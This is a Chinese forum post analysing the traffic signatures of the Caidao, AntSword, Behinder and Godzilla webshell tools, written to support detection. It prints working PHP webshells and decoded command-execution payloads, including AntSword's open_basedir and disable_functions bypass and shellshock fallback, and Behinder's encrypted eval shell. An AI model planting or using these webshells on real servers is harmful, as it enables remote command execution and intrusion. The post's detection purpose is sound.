常见webshell流量特性---菜刀/蚁剑/冰蝎/哥斯拉

河曲智叟  论坛元老 | 2025-3-11 03:14:24 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 1011|帖子 1011|积分 3033

前言

辨认常见Webshell流量的特性,可帮助我们辨认攻击者采取何种webshell工具,以及上传了什么范例的webshell,以下是一些常见的webshell流量特性。
中国菜刀

中国菜刀简介

菜刀主流版本主要是2011版、2014版、2016版。从2011版本到2014版本是功能性上进行了增强,从2014版本到2016版本是在隐秘性上进行了增强,2016版本的菜刀流量参加了混淆。
中国菜刀2011



变量1
  1. @eval(base64_decode($_POST[z0]));
复制代码
菜刀会默认再上传一个一句话木马进行后续的命令

z0

  1. QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1
  2. b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9Y
  3. mFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRS
  4. JdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7
  5. JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOz
  6. tlY2hvKCJ8PC0iKTtkaWUoKTs=
复制代码
  1. @ini_set("display_errors","0");
  2. //临时关闭PHP的错误显示功能
  3. @set_time_limit(0);
  4. //不限制页面执行时间,防止上传大马时超时
  5. @set_magic_quotes_runtime(0);
  6. //关闭魔术引号,加上反斜杠转义外部导入的特殊字符
  7. echo("->|");;
  8. $p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);
  9. $d=dirname($_SERVER["SCRIPT_FILENAME"]);
  10. //函数返回路径中的目录部分
  11. $c=substr($d,0,1)=="/"?"-c "{$s}"":"/c "{$s}"";
  12. $r="{$p} {$c}";@system($r." 2>&1",$ret);
  13. print ($ret!=0)?"ret={$ret}
  14. ":"";;echo("|<-");die();
复制代码
z1
  1. Y21k   cmd
复制代码
z2
  1. Y2QgL2QgIkM6XHhhbXBwXGh0ZG9jc1x1cGxvYWRcdXBsb2FkXCImd2hvYW1pJmVjaG8gW1NdJmNkJmVjaG8gW0Vd
复制代码
  1. cd /d "C:\xampp\htdocs\upload\upload"&whoami&echo [S]&cd&echo [E]
复制代码
  这里的[S]和[E]是用来辨认命令实行时的结果,以及当前地点目录,webshell工具中的目录

分析以上可得出其为windows系统的shell,Linux其实跟Windows的差不多
  中国菜刀2014


  1. $xx%3Dchr(98).chr(97).chr(115).chr(101).chr(54).chr(52)
  2. .chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);
  4. $xx=base64_decode;
复制代码
  1. $yy=$_POST;@eval/**/.($xx/**/.($yy[z0]));
  2. 这里/**/表示注释符号,没有意思,可以翻译成:
  3. @eval(base64_decode($_POST[z0]))
复制代码
Payload
  1. @ini_set("display_errors","0");
  2. @set_time_limit(0);
  3. @set_magic_quotes_runtime(0);
  4. echo("->|");;
  5. $m=get_magic_quotes_gpc();
  6. $p=base64_decode($m?stripslashes($_POST["z1"]):$_POST["z1"]);
  7. $s=base64_decode($m?stripslashes($_POST["z2"]):$_POST["z2"]);
  8. $d=dirname($_SERVER["SCRIPT_FILENAME"]);
  9. $c=substr($d,0,1)=="/"?"-c"{$s}"":"/c"{$s}"";
  10. $r="{$p}{$c}";
  11. $array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));
  12. $fp=proc_open($r." 2>&1",$array,$pipes);
  13. $ret=stream_get_contents($pipes[1]);
  14. proc_close($fp);
  15. print $ret;;
  16. echo("|<-");die();
复制代码
  和2011菜刀差别的点如下:
$m=get_magic_quotes_gpc(); 判定PHP有没有自动调用addslashes这个函数。若php调用了addslashes函数,则get_magic_quotes_gpc(),返回true。

默认情况下,PHP指令magic_quotes_gpc为on,对全部的GET、POST和COOKIE数据自动运行addslashes()。

不要对已经magic_quotes_gpc转义过的字符串使用addslashes(),由于这样会导致双层转义。遇到这种情况时可以使用函数get_magic_quotes_gpc() 进行检测。addslashes() 函数返回在预定义的字符前添加反斜杠的字符串。
  中国菜刀2016




Payload
   array_map(“ass”.“ert”,array(“ev”.“Al(”\$xx%3D\“Ba”.“SE6”.“4_dEc”.“OdE\”;@ev".“al(\$xx(‘QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JG09Z2V0X21hZ2ljX3F1b3Rlc19ncGMoKTskcD0nL2Jpbi9zaCc7JHM9J2NkIC92YXIvd3d3L21hc3Rlci9oYWNrYWJsZS91cGxvYWRzLztpcCBhZGRyO2VjaG8gW1NdO3B3ZDtlY2hvIFtFXSc7JGQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pOyRjPXN1YnN0cigkZCwwLDEpPT0iLyI%2FIi1jIFwieyRzfVwiIjoiL2MgXCJ7JHN9XCIiOyRyPSJ7JHB9IHskY30iOyRhcnJheT1hcnJheShhcnJheSgicGlwZSIsInIiKSxhcnJheSgicGlwZSIsInciKSxhcnJheSgicGlwZSIsInciKSk7JGZwPXByb2Nfb3Blbigkci4iIDI%2BJjEiLCRhcnJheSwkcGlwZXMpOyRyZXQ9c3RyZWFtX2dldF9jb250ZW50cygkcGlwZXNbMV0pO3Byb2NfY2xvc2UoJGZwKTtwcmludCAkcmV0OztlY2hvKCJYQFkiKTtkaWUoKTs%3D’));”);"));
  基本特性


  • 调用array_map函数隐蔽传输恶意代码。
  • 使用"Ba".“SE6”.“4_dEc”."OdE字符串拼接,隐蔽恶意代码。
  • QGluaV9zZXQoImRpc3BsYXlf…,该部分是转达攻击payload,payload依旧使用Base64编码的
  1. @ini_set("display_errors","0");
  2. @set_time_limit(0);
  3. if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};
  4. echo("X@Y");
  5. $m=get_magic_quotes_gpc();
  6. $p='/bin/sh';
  7. $s='cd /var/www/master/hackable/uploads/;ip addr;echo [S];pwd;echo [E]';
  8. $d=dirname($_SERVER["SCRIPT_FILENAME"]);
  9. $c=substr($d,0,1)=="/"6"-c "{$s}"":"/c "{$s}"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r."
复制代码
  array_map:array_map() 函数将用户自定义函数作用到数组中的每个值上,并返回用户自定义函数作用后的带有新值的数组。可以是自己自定义,也可以选择使用系统自带的比如assert/eval函数,实行命令。
  中国菜刀流量特性总结

菜刀2011
   2011的特性之后的其他版本都有,但不是大部分明文传输了,特性没2011显着
  

  • 明文传输,部分Base64(可解码)
  • payload以@ini_set(“display_errors”,“0”)开头
  • [S]和[E]是用来辨认命令实行的结果以及当前地点的目录
菜刀2014


  • chr()Ascii混淆
  • $m=get_magic_quotes_gpc(); 判定PHP有没有自动调用addslashes 这个函数。
   addslashes() 函数返回在预定义的字符前添加反斜杠的字符串。
  

  • $yy=$_POST;@eval/**/.($xx/**/.($yy[z0]));解释符混淆
  • proc_open&proc_close
   函数用于实行一个命令,并且打开用来输入/输出的文件指针
  菜刀2016
array_map函数隐蔽传输恶意代码
字符串拼接,如"Ba".“SE6”.“4_dEc”."OdE
中国蚁剑

蚁剑流量解码(URL)后的代码
  1. e82b77c74852d3=a6Y2QgIi92YXIvd3d3L21hc3Rlci9oYWNrYWJsZS91cGxvYWRzIjt3aG9hbWk7ZWNobyA3NjVjZTk7cHdkO2VjaG8gYTgzMjI=&k0f695a4c3d7fc=enL2Jpbi9zaA==&pass=@ini_set("display_errors", "0");@set_time_limit(0);
  2. $opdir = @ini_get("open_basedir");
  3. if ($opdir) {
  4.   $oparr = preg_split("/\\\\|\//", $opdir);
  5.   $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
  6.   $tmdir = ".5062e111e";@
  7.     mkdir($tmdir);@
  8.     chdir($tmdir);@
  9.     ini_set("open_basedir", "..");
  10.   for ($i = 0; $i < sizeof($oparr); $i++) {@
  11.     chdir("..");
  12.                                           }@
  13.     ini_set("open_basedir", "/");@
  14.     rmdir($ocwd.
  15.           "/".$tmdir);
  16. };
  18. function asenc($out) {
  19.   return $out;
  20. };
  22. function asoutput() {
  23.   $output = ob_get_contents();
  24.   ob_end_clean();
  25.   echo "6d29".
  26.     "1125";
  27.   echo@ asenc($output);
  28.   echo "699".
  29.     "aa2b";
  30. }
  31. ob_start();
  32. try {
  33.   $p = base64_decode(substr($_POST["k0f695a4c3d7fc"], 2));
  34.   $s = base64_decode(substr($_POST["e82b77c74852d3"], 2));
  35.   $envstr = @base64_decode(substr($_POST["u61bc3c18390c2"], 2));
  36.   $d = dirname($_SERVER["SCRIPT_FILENAME"]);
  37.   $c = substr($d, 0, 1) == "/" ? "-c "{$s}"" : "/c "{$s}"";
  38.   if (substr($d, 0, 1) == "/") {@
  39.     putenv("PATH=".getenv("PATH").
  40.            ":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
  41.                                } else {@
  42.     putenv("PATH=".getenv("PATH").
  43.            ";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
  44.                                       } if (!empty($envstr)) {
  45.     $envarr = explode("|||asline|||", $envstr);
  46.     foreach($envarr as $v) {
  47.       if (!empty($v)) {@
  48.         putenv(str_replace("|||askey|||", "=", $v));
  49.                       }
  50.     }
  51.   }
  52.   $r = "{$p} {$c}";
  53.   
  54.   function fe($f) {
  55.     $d = explode(",", @ini_get("disable_functions"));
  56.     if (empty($d)) {
  57.       $d = array();
  58.     } else {
  59.       $d = array_map('trim', array_map('strtolower', $d));
  60.     }
  61.     return (function_exists($f) && is_callable($f) && !in_array($f, $d));
  62.   };
  63.   
  64.   function runshellshock($d, $c) {
  65.     if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
  66.       if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
  67.         $tmp = tempnam(sys_get_temp_dir(), 'as');
  68.         putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
  69.         if (fe('error_log')) {
  70.           error_log("a", 1);
  71.         } else {
  72.           mail("a@127.0.0.1", "", "", "-bv");
  73.         }
  74.       } else {
  75.         return False;
  76.       }
  77.       $output = @file_get_contents($tmp);@
  78.         unlink($tmp);
  79.       if ($output != "") {
  80.         print($output);
  81.         return True;
  82.       }
  83.     }
  84.     return False;
  85.   };
  86.   
  87.   function runcmd($c) {
  88.     $ret = 0;
  89.     $d = dirname($_SERVER["SCRIPT_FILENAME"]);
  90.     if (fe('system')) {@
  91.       system($c, $ret);
  92.                       }
  93.     elseif(fe('passthru')) {@
  94.       passthru($c, $ret);
  95.                            }
  96.     elseif(fe('shell_exec')) {
  97.       print(@shell_exec($c));
  98.     }
  99.     elseif(fe('exec')) {@
  100.       exec($c, $o, $ret);
  101.                         print(join("
  102.                         ", $o));
  103.                        }
  104.     elseif(fe('popen')) {
  105.       $fp = @popen($c, 'r');
  106.       while (!@feof($fp)) {
  107.         print(@fgets($fp, 2048));
  108.       }@
  109.         pclose($fp);
  110.     }
  111.     elseif(fe('proc_open')) {
  112.       $p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
  113.       while (!@feof($io[1])) {
  114.         print(@fgets($io[1], 2048));
  115.       }
  116.       while (!@feof($io[2])) {
  117.         print(@fgets($io[2], 2048));
  118.       }@
  119.         fclose($io[1]);@
  120.         fclose($io[2]);@
  121.         proc_close($p);
  122.     }
  123.     elseif(fe('antsystem')) {@
  124.       antsystem($c);
  125.                             }
  126.     elseif(runshellshock($d, $c)) {
  127.       return $ret;
  128.     }
  129.     elseif(substr($d, 0, 1) != "/" && @class_exists("COM")) {
  130.       $w = new COM('WScript.shell');
  131.       $e = $w - > exec($c);
  132.       $so = $e - > StdOut();
  133.       $ret. = $so - > ReadAll();
  134.       $se = $e - > StdErr();
  135.       $ret. = $se - > ReadAll();
  136.       print($ret);
  137.     } else {
  138.       $ret = 127;
  139.     }
  140.     return $ret;
  141.   };
  142.   $ret = @runcmd($r." 2>&1");
  143.   print($ret != 0) ? "ret={$ret}" : "";;
  144. } catch (Exception $e) {
  145.   echo "ERROR://".$e - > getMessage();
  146. };
  147. asoutput();
  148. die(); & u61bc3c18390c2 = pp
复制代码
关注点
在第一行代码中存在了两个POST请求的内容:分别是e82b77c74852d3和k0f695a4c3d7fc,这两个值是没有办法通过base64解码出来的,查看第33行代码,你会发现这两个值的内容须要从第三个字符才开始取,然后再base64_decode。
   e82b77c74852d3=a6Y2QgIi92YXIvd3d3L21hc3Rlci9oYWNrYWJsZS91cGxvYWRzIjt3aG9hbWk7ZWNobyA3NjVjZTk7cHdkO2VjaG8gYTgzMjI=
k0f695a4c3d7fc=enL2Jpbi9zaA==

上面两个值,从第三个字符开始取,随后base64解码后得到:
  

  • cd "/var/www/master/hackable/uploads";whoami;echo 765ce9;pwd;echo a8322
  • /bin/sh
  特性:


  • 蚁剑代码源于中国菜刀,连接流量跟中国菜刀相似,一样寻常情况下也是base64一下,但是其扩充性很好,可以进行加密、混淆绕过
  • PHP类WebShell链接流量:将蚁剑的正文内容进行URL解码后,流量最中显着的特性为@ini_set (“display_errors”,“0”)。
  • 蚁剑中包含了很多加密、绕过插件,所以导致很多流量被加密后无法辨认,但是蚁剑混淆加密后还有一个比较显着的特性,即为参数名大多以“_0x…=”这种形式(下划线可更换为其他)
冰蝎

冰蝎数据
  1. <?php
  2. @error_reporting(0);
  3. session_start();
  4.   $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
  5.         $_SESSION['k']=$key;
  6.         session_write_close();
  7.         $post=file_get_contents("php://input");
  8.         if(!extension_loaded('openssl'))
  9.         {
  10.                 $t="base64_"."decode";
  11.                 $post=$t($post."");
  12.                
  13.                 for($i=0;$i<strlen($post);$i++) {
  14.                              $post[$i] = $post[$i]^$key[$i+1&15];
  15.                             }
  16.     # 这里将已经xor的内容和原始的key进行解亦或处理。
  17.         }
  18.         else
  19.         {
  20.                 $post=openssl_decrypt($post, "AES128", $key);
  21.     # 这里将aes加密的内容和key进行解密处理。
  22.         }
  23.     $arr=explode('|',$post);
  24.     $func=$arr[0];
  25.     $params=$arr[1];
  26.         class C{public function __invoke($p) {eval($p."");}}
  27.     @call_user_func(new C(),$params);
  28. ?>
复制代码
冰蝎的优点:


  • Java开辟,支持跨平台运行
  • 使用加密隧道传输数据,尽大概避免流量被WAF或IDS设备所捕获
  • AES/xor加密


   冰蝎2.0:
  

  • 在连接Webshell的时间会存在一个密钥协商的过程,这个过程是纯明文的数据交换,冰蝎存在这样的特性:发起一共两次的密钥协商,通过比较两次密钥协商的返回包中内容的差别部分来获取其中的密钥。
  • 冰蝎在发送HTTP请求时存在一些特性,例如其工具中内置了17个User-Agent头,在用户没有自定义的情况下会随机选择一个发送。但是这些User-Agent头大部分是一些老版本的浏览器或设备。
  冰蝎3.0
  

  • 去除动态密钥协商机制,采用预共享密钥,从原理上直接绕过了大量流量检测设备,全程无明文交互,密钥格式为md5(“str”),取前16位
  • 增长了插件机制,可开辟安装自定义扩展插件
  • UI框架由awt改为javafx,重写了大量逻辑
  • 增强了内网穿透功能,在原有的基于HTTP的socks5隧道底子上,增长了单端口转发功能,可一键将内网端口映射至VPS或者本机端口
  总结
冰蝎是一款动态二进制加密的Webshell工具,其流量特性包罗:


  • Payload特性:PHP中使用eval或assert,ASP中在for循环中进行异或处置处罚,JSP中使用Java反射。
  • 冰蝎2.0流量特性:第一阶段请求中返回包状态码为200,返回内容为16位密钥,请求包中存在Accept: text/html, image/gif, image/jpeg, ; q=.2, /; q=.2
  • 冰蝎3.0流量特性:请求包中content-length为5740或5720,请求头中存在Pragma: no-cache,Cache-Control: no-cache 1
  • 冰蝎4.0流量特性

    • 响应包中的"Transfer-Encoding"字段值必然是"chunked"
    • 异或及base64处置处罚的第一个响应包的开头字符为"TxcIQ"
    • 迷惑及base64处置处罚的第一个请求包的开头字符为"svfjTI"

哥斯拉

特性


  • 参数名固定:哥斯拉的请求参数名通常是 pass 或 password。
  • 加密特性 :AES加密
  • 固定分隔符:检查响应是否以 ->| 开头,以 |<- 结尾。

检测思路

检测Webshell流量的方法包罗静态检测、动态检测和日志检测:


  • 静态检测:通过匹配特性码、特性值和危险函数来查找Webshell。
  • 动态检测:监控HTTP请求,检测非常文件访问和返回200的情况。
  • 日志检测:分析Web服务器日志,查找非常的HTTP请求和文件操作

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

河曲智叟

论坛元老
这个人很懒什么都没写!

楼主热帖

标签云

运维 CIO 存储 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表